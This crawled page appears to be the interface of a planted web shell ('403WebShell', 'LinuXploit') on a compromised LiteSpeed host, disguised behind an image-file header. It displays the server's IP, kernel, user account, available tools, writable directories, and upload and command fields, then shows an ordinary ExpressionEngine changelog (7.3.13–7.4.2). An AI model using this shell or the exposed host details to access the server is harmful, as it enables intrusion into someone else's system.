����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 52.15.225.105
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/softaculous/eengine/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/softaculous/eengine/changelog.txt
Version 7.4.2
(Release: February 27, 2024)

	Contributors 🙌

		Asad Munir

		@asadmunir


		Yuri Salimovskiy

		@intoeetive


		Bryan Nielsen

		@bryannielsen


		Yulyaswan

		@Yulyaswan

Enhancements 🚀

	Improved styles for Checkboxes fieldtype in Channel Form
	Include short field name in keyword search in channel settings
	Added auto focus when editing Folder Name in the File Manager
	Enabled specifying database for the Redis cache driver in config file; #3997

Bug Fixes 💃🐛

	Resolved issue where cloning entry with Closed status was causing an error
	Resolved #3998 where no proper error was shown when trying to clone entry with an invalid IP address
	Resolved #3968 where sorting order in Entry Manager was reset after applying filter
	Resolved #3942 where using undefined layout variables as array would cause parsing issue
	Resolved #3933 where chaining invalid modifier on File field would cause PHP error
	Resolved #3769 where an image could been uploaded several times after closing file selection window
	Resolved #3858 where File field was still showing upload component when user did not have File Manager permission
	Resolved #3824 where fieldtypes in Fieldtype Advisor were not properly sorted
	Resolved #3807 where EE Debug’s Font Awesome CSS tag was too aggressive
	Resolved #4086 where update to 7.4 could show preflight error on some installations

Developers 💻

	Added programmatic ability to add publish layout tabs for specific channels

Version 7.4.1
(Release: February 19, 2024)

Enhancements 🚀

    Support swatches for Colorpicker field in Channel Form

Bug Fixes 💃🐛

    Resolved #4050 where error was shown in Channel Form when multiple category groups were assigned
    Resolved #4048 where category group could not be added from Channel page if no other category groups exist
    Resolved issue when category group settings were not retained after editing from Channel page
    Resolved issue where {categories} variable pair was not populated in Channel Form
    Resolved issue where only one category group was shown in Categories filter in Entry manager if the channel is selected
    Resolved issue where Categories filter was empty if no channel is selected in Entry Manager
    Resolved #3913 where PHP deprecation error could be shown on entry manager page when entry author did not exist
    Resolved #3894 where PHP error could be shown when displaying CAPTCHA using PHP 8.1
    Resolved #3886 where namespace of exception handler in the backup:database command was causing issues when it fails
    Resolved #3883 where update:prepare command could throw errors

Version 7.4.0
(Release: February 14, 2024)

Enhancements 🚀

    Added Members fieldtype to select one or multiple members in channel entry; #1080
    Introduced ability for custom fieldtypes to be used in Member profiles; #715
    Introduced new Member Manager with configurable column display
    Added global variables for logged in user’s avatar; #2583
    Enabled logging in using email address; #2931
    Member Registration and Profile Edit forms now include form field output options similar to Channel Entry form.
    Added more variables to address position of field in group inside Fluid field
    Enabled editing HTML source in RTE with CKEditor
    Added RTE configuration to use custom CKEditor build
    Added Styles plugin for CKEditor in RTE; #3136
    Added RedactorX as editing engine for RTE
    Deprecated Redactor editing engine
    Enabled showing field short names on Entry Publish page; #3340
    Enabled passing through valid HTML form attributes to forms in ExpressionEngine as tag parameters; #441
    Improved getting real IP address of visitor when using load balancers
    Added ability to edit file metadata from file field; #2855
    Added primary_role_id parameter for exp:channel:entries to work same as older group_id; #1353
    Enabled synchronizing upload directory via CLI; #3044
    Added CLI command to run Content Reindex; #3428
    Added styles to Toggle, Slider, Radio, Grid, Date, Selectable Buttons fieldtypes for better use with Channel Form
    Enabled {exp:member:has_role} to check against multiple roles; #2749
    Improved updater script to ensure that built-in roles are always present; #3200
    Improved Entry Date field to make it user-friendly to pick different time; #3021
    Added {exp:member:role_groups} template tag
    Allow making category group required for channel
    Allow restricting category selection to single category per group; #2865
    Improved performance of Structure tab on entry publish page
    Improved synchronization of conditional fields status

Bug Fixes 💃🐛

    Resolved #3489 where member_rows variable in exp:member:memberlist did not support backspace parameter
    Resolved #2806 where relationships field data was not saved if that was the only change for ChannelEntry model
    Resolved #3865 where cloning entries with field groups in Fluid field did not retain grouping
    Resolved #2703 where legacy member template could be shown when placing empty member tag
    Resolved #243 where email length was limited to maximum username length
    Resolved #3841 where some characters in entry title might cause automatic url_title generation to not work
    Resolved #3973 where cloned channel might been not shown as option when saving entry
    Resolved PHP compatibility issue in Channel Calendar tags

Developers 💻

    Enable passing through MySQL PDO configuration from config file; #2989; #3427
    Only set MySQL collation explicitely if it’s different than default
    Skip performing SQL JOIN on field data tables, if no custom fields exist on model
    Added cli_boot and cli_before_handle extension hooks to run on each CLI request; #2846
    Added before_response_send_output and after_response_send_output extension hooks

Version 7.3.15
(Release: January 18, 2024)

Important: This version includes important security updates.

Bug Fixes 💃🐛

	Resolved #3989 where Role permissions could have been saved during validation request
	Resolved #3749 where TLS 1.3 was showing up as option in email settings for PHP versions that don’t support it
	Resolved #3860 where certain “Save” buttons did not scale properly on mobile devices
	Resolved #3884 where error could be shown using CLI sync:conditional-fields command when using PHP 8.2
	Resolved issue where saving entry with Fluid field using groups could throw PHP error if field was removed from group

Version 7.3.14
(Release: October 24, 2023)

Enhancements 🚀

	Changed description for is_system_on setting on MSM sites for extra clarity; #3043
	Added {folder_id} variable and parameter for subfolder support in exp:file:entries tag; #3820
	Added possibility to collapse categories in control panel; #2917
	
Bug Fixes 💃🐛

	Resolved #3745 where Color picker not working inside grid
	Resolved #3841 where foreign_chars config was missing commonly used symbol
	Resolved #3825 where PHP deprecation error could be shown when using some third-party fieldtypes in Fluid field
	Resolved #3808 where PHP deprecation messages could be shown when saving entry using PHP 8.2
	Resolved issue where it was not possible to address new tabs on CP Layouts page with external JavaScript

Version 7.3.13

(Release: October 11, 2023)

Bug Fixes 💃🐛

    Resolved #3766 where using invalid modifier when chaining on-the-fly image manipulations would cause PHP warning
    Resolved #3762 where selection of checkboxes in Grid with values containing single quotes was not re-populated after saving an entry
    Resolved #3743 where invisible characters in filenames caused corrupt path errors
    Updated ColorPicker fieldtype so it could be used with Channel Form
    Resolved #3754 where PHP deprecation notice could be shown when using File Grid with file column empty
    Resolved #3759 when pressing Ctrl+S with Redactor editor being in full screen mode would cause the field content to be erased
    Resolved #3772 where ExpressionEngine News dashboard widgets was not using date fomatting preference
    Resolved issue where CP could sometimes redirect to invalid URL after idle session
    Resolved some PHP 8.2 compatibility issues

Youez - 2016 - github.com/yon3zu
LinuXploit